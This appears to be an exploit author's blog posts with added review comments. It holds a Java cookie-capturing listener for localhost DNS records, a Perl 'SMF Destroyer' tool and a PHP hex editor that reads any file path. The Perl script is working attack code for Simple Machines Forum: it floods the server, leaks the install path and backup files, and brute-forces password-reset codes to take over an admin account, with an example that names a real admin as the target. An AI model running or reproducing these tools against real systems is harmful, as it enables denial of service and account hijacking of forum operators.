Author: Xianur0
Vulnerable Version: All

http://securityreason.com/exploitalert/5590

[PoC] Problems Invalids DNS Records

Posted on 14:06 by Xianur0

A classic mistake is a DNS zone that, by default, carries an "A" record pointing to localhost (127.0.0.1), for example:
localhost.php.net = 127.0.0.1
If we make an HTTP GET request to that subdomain, the request ends up at our own computer on port 80, so we can write an exploit that captures the data arriving on this port (including cookies).

PoC Applet:

Código:
/*
* PoC Problems Invalids DNS Records.
* Author: Xianur0
* Credits:
* Pandora's Box Team: http://e-r00t.s0me.co.cc
* Infierno Hacker: http://www.infiernohacker.com/
*/
import java.applet.Applet;
import java.io.*;
import java.net.*;

//By Xianur0
//uxmal666@gmail.com

public class PoC extends Applet {
// Single-connection listener used as the PoC for the localhost A-record issue
// described above: a browser resolving such a subdomain connects to 127.0.0.1:80,
// where this program prints every request line (and therefore any Cookie header
// the browser attaches). Operationally a plain program via main(); the Applet
// base class is never exercised. Defensive takeaway: do not publish records
// under a production zone that resolve to 127.0.0.1.
public static void main(String args[])
{
// Message terminator
char EOF = (char)0x00;   // NUL appended to the canned response and to every echoed line
try
{
// Binding port 80 usually needs elevated privileges; failure lands in the catch below.
ServerSocket s = new ServerSocket(80);
System.out.println("Server started. Waiting for connections...");
// wait for incoming connections (blocks until the first client connects; only that one is served)
Socket incoming = s.accept();
BufferedReader data_in = new BufferedReader(new InputStreamReader(incoming.getInputStream()));
PrintWriter data_out = new PrintWriter(incoming.getOutputStream());
// HTTP Response (Fake) -- written before any request line is read. Note the status line
// and the "Date="/"Content-Type=" separators are not well-formed HTTP; browsers may reject it.
data_out.println("OK - 200\nCache-Control: private, max-age=0\nDate=Sat, 17 Jan 2009 18:15:23 GMT\nExpires: -1\nServer: Xianur0Exploit\nContent-Type=text/html; charset=UTF-8\n\nXianur0 Was Here!\n\n" + EOF);
data_out.flush();

boolean quit = false;

while (!quit)
{
String msg = data_in.readLine();
if (msg == null) quit = true;
// NOTE(review): when readLine() returns null (peer closed), the next line still calls
// msg.trim() and throws NullPointerException; that exception is caught below and reported
// as a socket-creation failure. Neither socket is closed on any exit path.
System.out.println("HTTP Header: "+msg.trim()+EOF);
data_out.flush();
}
}
catch (Exception e)
{
// Also reached by the NullPointerException from the loop above, so this message is misleading.
System.out.println("Can not create socket!");
}
}
}




You only need to run the applet, which creates a socket listening on port 80 and prints the arriving data :)...


Nota: A los que decían que era imposible este bug simplemente les dire me salio el applet!! xDDDDDD

para que entiendan mas el como funciona:

http://xianur0.blogspot.com/2008/08/xss-otro-nivel.html

aunque supongo que ya es un tema muy simple de entender xDDD


#!/usr/bin/perl

use LWP::UserAgent;
use Getopt::Std;
use LWP::Simple;
use HTTP::Request;

#By Xianur0
#Uxmal666@gmail.com

# Banner, then argument handling.  There is no `use strict`/`use warnings`:
# apart from $url and $proxy, everything below (%opt, $ua, $req, $res, ...)
# is a package global shared with the subs that follow.
print "\n\n\x09\x09\x09\x09\x09SMF Destroyer 0.1 By Xianur0 [Priv8]\n\n";
# $ARGV[1] is read before getopts() strips the switch from @ARGV, so the
# expected layout at this point is: [option] [url] [proxy].
# `die` without a trailing "\n" appends the script location to the usage text.
my $url = $ARGV[1] || die ("Use: smf.pl [option] [Full URL] [Proxy:Puerto]\nOptions:\n-f Flood \n-p Search Directory Setup \n-l Installed Mods List \n-b Find Temporary\n-c Link crack Activation (Recommended Use Proxy)");
# version() also creates the global $ua user agent that every other sub reuses.
version();
my $proxy = $ARGV[2] || "";
# -c mode takes its proxy from $ARGV[3] inside crackeador(), so it is skipped here.
if($ARGV[0] ne "-c" && $proxy ne "") {
$ua->proxy(["http"], "http://".$proxy);
}

# getopts() removes the switch from @ARGV; afterwards $ARGV[0] is the URL,
# which is the layout crackeador() relies on.  %opt is an undeclared global.
# Several switches may be set at once; the subs run in the order listed.
getopts('fplbc', \%opt);
crackeador() if $opt{c};
flood() if $opt{f};
path() if $opt{p};
list() if $opt{l};
temp() if $opt{b};

# Stamp the fixed browser-like request headers onto the global $req.
# Every sub in this script calls it (as `&headers;`) right after building
# its HTTP::Request.
sub headers {
    my @browser_headers = (
        'Accept'          => 'text/html',
        'Accept-Language' => 'es-es,es;q=0.8,en-us;q=0.5,en;q=0.3',
    );
    $req->header(@browser_headers);
}

# Fetch $url and fingerprint the SMF version from the "Powered by SMF" footer
# link.  Side effects: creates the global $ua (reused by every other sub) and
# the globals $req, $res and $version.
sub version {
$ua = LWP::UserAgent->new;
# Spoofed browser User-Agent string.
$ua->agent('Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12');
$req = HTTP::Request->new(GET => $url);
&headers;
$res = $ua->request($req);
if ($res->is_success) {
my $html = $res->content;
# Non-greedy capture of whatever sits between "Powered by SMF " and "</a>".
if ($html =~ /title="Simple Machines Forum" target="_blank">Powered by SMF (.*?)<\/a>/){
$version = $1;
print "\n[X] SMF Version: $version\n";
# NOTE(review): `<` is a numeric comparison; "1.1.7" is read as 1.1 (with a
# warning under `use warnings`), so this is not a real dotted-version compare.
if($version < "1.1.7") {
print "\n[X] Outdated Version $version!!!!!!!!!!!\n\n[X] http://milw0rm.com/search.php?dong=smf".$version."\n\n";
}
}}}

# Request /SSI.php?ssi_layers and look for a PHP "Undefined variable" notice in
# the response body, which reveals the absolute install directory.  This only
# works when the server renders PHP notices into the page; display_errors
# turned off in production removes the leak.  Uses the globals $url, $ua, $req, $res.
sub path {
$req = HTTP::Request->new(GET => $url.'/SSI.php?ssi_layers');
&headers;
$res = $ua->request($req);
if ($res->is_success) {
my $html = $res->content;
# The notice text ends with the path of the file that raised it.
if ($html =~ /Undefined variable: ssi_layers in <b>(.*?)SSI.php/){
print "[X] Directory: $1\n";
} else { print "[!] Getting error Directory!\n";}   # notice not in the page (errors hidden) or different markup
}
}

# Send the same oversized help-page GET up to 9999 times, printing a counter
# per successful response.  Despite the banner, the loop is bounded by the
# counter, not only by Ctrl+C.  Uses the globals $url, $ua, $req, $res;
# $texto and $i are also globals (no `my`).
sub flood {
print "[X] Starting Flood! (Press Ctrl + C To Finish)\n";
$texto = "Flood!!!!!" x 15;   # 150-byte filler used as an array-style query key
$req = HTTP::Request->new(GET => $url.'/index.php?action=help;page['.$texto.']=loginout');
&headers;
# One request object is reused for every iteration.
for($i = 1; $i<10000; $i++) {
$res = $ua->request($req);
if ($res->is_success) {
print "[-] Sent: ".$i."\n";
} else {
print "[!] HTTP Error Query: " . $res->status_line . "\n";
}
}
}


# Request each candidate editor-backup name under $url and report any 2xx
# response as a found file.  Success is taken at face value: a site that
# answers 200 for unknown paths (soft 404) will report every name as found.
# @temps and $temp are globals (no `my`); $req/$res are the shared globals.
sub temp {
@temps=('index.php~','Settings.php~','Settings_bak.php~');
foreach $temp (@temps) {
$req = HTTP::Request->new(GET => $url."/".$temp);
&headers;
$res = $ua->request($req);
if ($res->is_success) {
print "[X] Temporary File Found: ".$url."/".$temp."\n";
} else {print "[!] Not Found: ".$url."/".$temp."\n";}
}
}

# Fetch Packages/installed.list and print one record per line, splitting each
# on the literal "|^|" separator into description, file, name and version.
# If this file is web-reachable it is an information leak; denying HTTP access
# to the Packages directory closes it.  Uses the globals $url, $ua, $req, $res;
# $mod is a global loop variable, distinct from the lexical @mod below.
sub list {
$req = HTTP::Request->new(GET => $url."/Packages/installed.list");
&headers;
$res = $ua->request($req);
if ($res->is_success) {
my $html = $res->content;
my @htmls = split("\n", $html);
foreach $mod (@htmls) {
# The single-quoted string is used as a regex: \| \^ \| match the literal "|^|".
my @mod = split('\|\^\|', $mod);
print "[X]Package:\nDescription: $mod[0]\nFile: $url/Packages/$mod[1]\nName: $mod[2]\nVersion: $mod[3]\n\n";

}
}
}

# -c mode: guesses the 10-character code of an SMF password-reset link for one
# account.  It has its own argument layout ($ARGV[0] url, [1] nick, [2] user id,
# [3] optional proxy), which only lines up because getopts() has already removed
# "-c" from @ARGV.  mail(), generador() and brute() below are named subs nested
# in this one; Perl compiles them as package-level subs that capture $reminder
# and $id from the first crackeador() call only, so this sub must not run twice.
# Server-side weakness relied on: the reset handler accepts unlimited wrong
# codes for a user with no lockout or delay.  Detection: a burst of reminder
# POSTs for one u= value with a changing code= from a single client; mitigation:
# per-user attempt limits and invalidating the code after a few failures.
sub crackeador() {
$url = $ARGV[0];
$nick = $ARGV[1];   # global
$id = $ARGV[2] || die("Use: smf.pl -c [URL SMF] [Nick Admin] [ID Admin] [Proxy:Puerto]\nExample: smf.pl -c http://www.simplemachines.org/community/ dschwab9 179 www.carlosslim.com:3128\n");
my $reminder = $url."?action=reminder";
my $smf = $reminder.";sa=setpassword;u=".$id.";code=";   # built but not referenced by the subs below
my $proxy = $ARGV[3];
# An absent $ARGV[3] is undef, which stringifies to "" here, so no proxy is set.
if($proxy ne "") {
$ua->proxy(["http"], "http://".$proxy);
}

# Step 1: load the reminder form for a session cookie and the "sc" form token,
# then POST the reminder request for $nick so the server emails a reset link.
# Uses the globals $ua, $contenedor, $session, $sc.
sub mail() {
my $content = HTTP::Request->new(GET => $reminder);
$contenedor = $ua->request($content)->as_string;   # full response, headers included
# The pattern spans a literal newline: it captures the whole Set-Cookie line.
if ($contenedor =~ /Set-Cookie: (.*?)
/){
print "\n[+] SESSION Detected: $1\n";
$session = $1;   # replayed as the Cookie header of the POST below
} else { die "[!] SESSION could not be found!\n";}
if ($contenedor =~ /<input type="hidden" name="sc" value="(.*?)"/){
print "\n[+] sc Detected: $1\n";
$sc = $1;   # SMF per-session form token
} else { die "[!] SC could not be found!\n";}
my $req = HTTP::Request->new(POST => $reminder.';sa=mail');
$req->content_type('application/x-www-form-urlencoded');
$req->content('user='.$nick.'&sc='.$sc.'&=enviar');   # $nick is inserted without URL-encoding
$req->header('Cookie' => $session);
my $res = $ua->request($req)->as_string;
if(!$res) {exit;}   # as_string() of a response is never empty, so this never exits
print "[x]Sent!\n";

}

# Step 2 helper: a string of 10 random lowercase hex characters.
# $checksum is declared but never used; $_rand is a global.
sub generador() {
my $password = "";
my $checksum = "";
my @chars = split(" ","0 1 2 3 4 5 6 7 8 9 a b c d e f");
for (my $i=0; $i < 10 ;$i++) {
$_rand = int(rand 16);   # index into @chars
$password .= $chars[$_rand];
}
return $password;
}

# Step 3: loop until exit -- $bucle is never assigned, so the condition is always
# true.  Each pass generates a code, refreshes sc/session from the reminder page,
# and POSTs a password change using that code.  Exits on the first response that
# contains the user-name input field; dies on the first non-2xx response.
# Globals touched: $code, $sc, $session, $res.
sub brute() {
while($bucle ne "finito") {
$code = generador();
my $fuente = $reminder.";sa=setpassword;u=".$id.";code=".$code;
my $content = HTTP::Request->new(GET => $reminder);
my $content = $ua->request($content)->as_string;   # redeclares $content ("masks earlier declaration" warning)
if ($content =~ /<input type="hidden" name="sc" value="(.*?)"/){
$sc = $1;
} else { die "[!] SC could not be found!\n";}
# Same newline-spanning Set-Cookie capture as in mail().
if ($content =~ /Set-Cookie: (.*?)
/){
print "\n[+] New SESSION Detected: $1\n";
$session = $1;
} else { die "[!] SESSION could not be found!\n";}
print "[+] Testing Code: ".$code."\n";
my $req = HTTP::Request->new(POST => $reminder.';sa=mail');
$req->content_type('application/x-www-form-urlencoded');
$req->content('passwrd1=xianur0washere&passwrd2=xianur0washere&code='.$code.'&u='.$id.'&sc='.$sc);   # hard-coded replacement password
$req->header('Cookie' => $session);
$res = $ua->request($req);
if ($res->is_success) {
# The string is used as a regex with no capture group, so the $1 printed below
# still holds the Set-Cookie value captured above, not a user name.
if($res->content =~ '<input type="text" name="user" size="20" value="') {
print "[-] Password Changed!\n[x] New password: xianur0washere\nUsername: $1\n";
exit;
}
} else { die "[!] HTTP response incorrect!\n";}}}

print "\n[-] Sending Mail...\n\n";
mail();
print "\n[-] Attacking code link recovery...\n";
brute();
}

Nota: Gracias Gente por hacerme notar que los códigos de los links tienen checksum :)..

la funcion del crackeador es la que esta activa en todos los SMF, es decir, no hay un sistema anti-flood/que filtre el probar códigos para resolver el link de recuperación, es decir envio el mail de recuperación a la cuenta del admin, y se le envia un link con un código de 10 caracteres que solo cubren letras y numeros, y además no hay un sistema que detecte cuando se esta usando un bot para probar los códigos del link (es decir se genera aleatorio 10 caracteres y se prueba intentar cambiar la password y si el admin no ve el correo en su bandeja, en un rato la tool lograra descubrir el código del link de recuperación y cambiar la password, por ende en un rato con esa tool ya tienes la cuenta del admin :)...)

todo esto automatizado (desde el envio del mail hasta el cambiar la password y generar el código).

Simple no?

Editor Hexadecimal PHP By Xianur0

Posted on 13:23 by Xianur0


<?php
// Landing page: a single POST form asking for the path of the file to open.
function html() {
    $lines = array(
        '<html>',
        '<head><title>Editor Hexadecimal PHP By Xianur0</title></head>',
        '<body>',
        '<h1>Editor Hexadecimal PHP By Xianur0</h1>',
        '<form method="post">',
        'Path Archivo: <input name="archivo" type="text">',
        '<br><input type="submit" value="Hex!">',
        '</form>',
    );
    echo implode("\n", $lines);
}
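// Send $descargar to the client as a binary download named "cambiarnombre".
// The original Content-Disposition value ended in "\n"; PHP refuses header
// values containing a newline (its header-injection guard), so that header was
// never actually sent. The newline is dropped and a Content-Length added so the
// browser knows the full size of the payload.
function descargar($descargar){
    header("Content-type: application/octet-stream");
    header("Content-Disposition: attachment; filename=cambiarnombre");
    header("Content-Length: " . strlen($descargar));
    print $descargar;
}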
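if(isset($_POST['archivo'])) {
    // The path is taken verbatim from the request, so anyone who can reach this
    // script can read (and, via the next branch, rewrite) any file the web
    // server user can access. Keep it off any public webroot, or add a
    // base-directory allow-list before the define below.
    define("path",$_POST['archivo']);
    // Render $byte as two panes: an editable textarea of decimal byte values
    // and a read-only textarea of the raw characters, eight per numbered line.
    // Both panes carry the same "N. " labels so the rows line up.
    function detectar($byte) {
        $linea = 1;
        $ordenados = "";
        $ordenadosh = "";
        $total = strlen($byte);
        print "<form method='post'><textarea name='modificado' rows='20' cols='40'>";
        for ($i = 0; $i < $total; $i++) {
            if ($i > 0) {
                // Separator *between* bytes only: a space, or a line break plus the
                // next label after every eighth byte. (The original keyed on
                // is_int($i/8), which broke the line after the first byte and left
                // a dangling separator after the last one.)
                if ($i % 8 == 0) {
                    $linea++;
                    $caracter = "\n".$linea.". ";
                } else {
                    $caracter = " ";
                }
                $ordenados .= $caracter;
                $ordenadosh .= $caracter;
            }
            $ordenados .= $byte[$i];        // $str{$i} offsets were removed in PHP 8
            $ordenadosh .= ord($byte[$i]);
        }
        print "1. ";
        print $ordenadosh;
        print "</textarea><textarea readonly='true' rows='20' cols='40'>";
        print "1. ";
        // Raw file bytes land inside the page: escape them so a file containing
        // "</textarea><script>" cannot break out of the read-only pane. ISO-8859-1
        // is used because every byte is valid in it (UTF-8 mode returns "" for
        // binary input).
        print htmlspecialchars($ordenados, ENT_QUOTES, 'ISO-8859-1')."</textarea><br><br><input type='submit' value='Guardar!'></form>";
    }
    // Fail visibly instead of handing a false handle to fread(): a bad path under
    // @fopen/@fread used to produce an empty editor with no message.
    $codigo = (is_file(path) && is_readable(path)) ? file_get_contents(path) : false;
    if ($codigo === false) {
        print "No se pudo leer el archivo.";
    } else {
        detectar($codigo);
    }
}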
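if(isset($_POST['modificado'])) {
    // Rebuild the file from the edited decimal pane and send it back as a
    // download. Each line is "N. v v v ..."; the label before the first "." is
    // dropped and every remaining space-separated token is one byte value.
    function guardar($modificado) {
        $legible = "";
        foreach (explode("\n", $modificado) as $valor) {
            // Limit 2 so a "." inside the value part cannot truncate it.
            $valores = explode(".", $valor, 2);
            if (!isset($valores[1])) {
                continue;   // blank or label-less line
            }
            foreach (explode(" ", $valores[1]) as $numero) {
                $numero = trim($numero);   // also strips the "\r" of CRLF line endings
                // The original passed every empty token (leading space, line ends)
                // to chr(), inserting stray NUL bytes into the download.
                if ($numero === "" || !preg_match('/\A\d+\z/', $numero)) {
                    continue;
                }
                $legible .= chr((int) $numero);
            }
        }
        descargar($legible);
    }
    guardar($_POST['modificado']);
    exit;
}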
// Reached on a plain GET and also after the 'archivo' branch above (which does
// not exit), so the path form is appended below the hex panes in that case.
html();
?>